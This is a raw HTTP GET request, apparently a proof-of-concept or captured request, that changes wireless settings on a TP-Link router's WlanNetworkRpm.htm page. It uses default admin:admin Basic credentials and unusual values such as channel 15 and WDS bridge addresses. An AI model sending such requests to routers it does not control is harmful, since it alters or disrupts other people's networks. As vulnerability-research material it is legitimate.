GET /userRpm/WlanNetworkRpm.htm?ssid1=TP-LINK_000000&region=101&channel=15&mode=2&chanWidth=1&rate=41&ap=1&broadcast=2&wdsbrl=2&brlssid=00-1D-0F-11-22-31&brlbssid=00-1D-0F-11-22-33&keytype=2&wepindex=2&authtype=2&keytext=admin&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://192.168.0.1/userRpm/WlanNetworkRpm.htm
Upgrade-Insecure-Requests: 1

